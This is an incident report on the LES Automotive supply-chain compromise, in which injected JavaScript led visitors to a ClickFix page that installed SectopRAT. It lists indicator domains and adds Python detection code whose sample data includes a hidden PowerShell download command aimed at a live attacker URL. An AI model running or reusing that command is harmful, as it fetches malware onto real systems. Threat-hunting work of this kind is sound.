
Cyber Incident Victim: LES Automotive

Date: Nov 2025

Location: United States of America

Summary

A supply chain compromise of a third‑party video service used by auto dealerships led to the injection of malicious JavaScript that redirected visitors to a ClickFix page prompting them to run PowerShell commands. The commands downloaded and executed SectopRAT, a remote access trojan, affecting over 100 dealerships before the service provider, LES Automotive, remediated the issue.


Description

The compromise began when threat actors infiltrated LES Automotive, a third‑party video service used by more than one hundred auto dealerships, and injected malicious JavaScript into the shared file les_video_srp.js hosted at https://www.idostream[.]com/member/les_video_srp.js. When a dealership website loaded this script, it dynamically created another script element that pointed to https://security-confirmation[.]help/captchav2, which in turn redirected visitors to a ClickFix page at https://www.deliveryoka[.]com/webservice_ionic/captchav2.html?us. The ClickFix page displayed a fake reCAPTCHA prompt instructing users to click a checkbox to prove they were not a robot, after which it placed a PowerShell command into the clipboard and directed the user to open the Windows Run dialog, paste the command, and execute it. The JavaScript responsible for copying the command contained a Russian comment reading “Очистите предыдущий таймаут,” meaning “Clear the previous timeout,” and researchers noted that victims were often served a benign version of the script, indicating the injection was likely performed dynamically.


Executing the clipboard‑delivered PowerShell command initiated a chain of downloads: first contacting https://bitly[.]cx/UnluS, which redirected to https://main-login[.]sbs/maison/tree, then retrieving a second Bitly link that pointed to https://main-login[.]sbs/fernandino/brend. This file was saved as Lancaster.zip in the user’s temporary folder, extracted, and the executable zkwindow.exe was launched. Analysis of the extracted file in a Triage sandbox identified the payload as SectopRAT, a remote access trojan, with the maximum threat score of ten out of ten. The attack thus delivered SectopRAT to any visitor who completed the ClickFix steps, potentially compromising the systems of dealership customers and employees across the more than one hundred affected dealerships. The compromise of LES Automotive was identified by security researchers, and the provider subsequently remediated the issue, removing the malicious code from les_video_srp.js and restoring the legitimate version of the shared video service. Indicators of compromise associated with the campaign include the domains security-confirmation[.]help, deliveryoka[.]com, bitly[.]cx, and main-login[.]sbs, along with the specific file hashes and URLs detailed in the public reports.
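The chain above leaves two artefacts a defender can hunt for: web requests to the listed domains (the redirect hop and the download stages) and a PowerShell process started from the Windows shell after the user pastes into the Run dialog. The following Python is an added example written for this page, not code from the incident report or from LES Automotive; the proxy log format and the process-event fields are hypothetical, and the sample lines are constructed to mirror the redirect chain described here.

```python
import re
from urllib.parse import urlparse

# Indicators named in the incident write-up (kept defanged as published).
IOC_DOMAINS_DEFANGED = [
    "security-confirmation[.]help",
    "deliveryoka[.]com",
    "bitly[.]cx",
    "main-login[.]sbs",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'bitly[.]cx' back into 'bitly.cx'."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def host_matches_ioc(host: str) -> bool:
    """True if host equals an IoC domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


# --- Web proxy check ---------------------------------------------------
# Constructed sample lines; hypothetical format: <timestamp> <client IP> <URL>.
SAMPLE_PROXY_LOG = """\
2025-11-03T10:14:02Z 10.0.5.21 https://www.idostream.com/member/les_video_srp.js
2025-11-03T10:14:03Z 10.0.5.21 https://security-confirmation.help/captchav2
2025-11-03T10:14:04Z 10.0.5.21 https://www.deliveryoka.com/webservice_ionic/captchav2.html?us
2025-11-03T10:16:40Z 10.0.5.21 https://bitly.cx/UnluS
2025-11-03T10:16:41Z 10.0.5.21 https://main-login.sbs/maison/tree
2025-11-03T10:20:00Z 10.0.5.22 https://www.example.com/index.html
"""


def flag_proxy_lines(log_text: str) -> list:
    """Return (timestamp, client, host) for every request to an IoC domain."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash the sweep
        ts, client, url = parts
        host = urlparse(url).hostname or ""
        if host_matches_ioc(host):
            hits.append((ts, client, host))
    return hits


# --- Process-creation check --------------------------------------------
# Constructed sample events; hypothetical fields from an EDR/Sysmon feed.
SAMPLE_PROCESS_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr https://bitly.cx/UnluS"'},
    {"parent": r"C:\Program Files\VSCode\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://([^\s/'\"]+)", re.IGNORECASE)


def is_clickfix_like(event: dict) -> bool:
    """ClickFix pattern: PowerShell spawned by explorer.exe (the Run dialog's
    parent) that hides its window or reaches a known-bad host."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return False
    if not parent.endswith("explorer.exe"):
        return False
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE) is not None
    bad_host = any(host_matches_ioc(h) for h in URL_RE.findall(cmd))
    return hidden or bad_host


def flag_process_events(events: list) -> list:
    """Return the events that match the ClickFix execution pattern."""
    return [e for e in events if is_clickfix_like(e)]


if __name__ == "__main__":
    for hit in flag_proxy_lines(SAMPLE_PROXY_LOG):
        print("proxy hit:", hit)
    for ev in flag_process_events(SAMPLE_PROCESS_EVENTS):
        print("process hit:", ev["cmdline"])
```

The domain match is deliberately suffix-based so that www.deliveryoka.com is caught by the bare deliveryoka.com indicator, and the compromised idostream.com host is not flagged because the page lists it as the legitimate (later restored) origin rather than as an IoC. The process rule keys on the explorer.exe parent rather than on the command text alone, since the copied command changes between campaigns while the Run-dialog launch path does not.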

Sources: 2 (members only)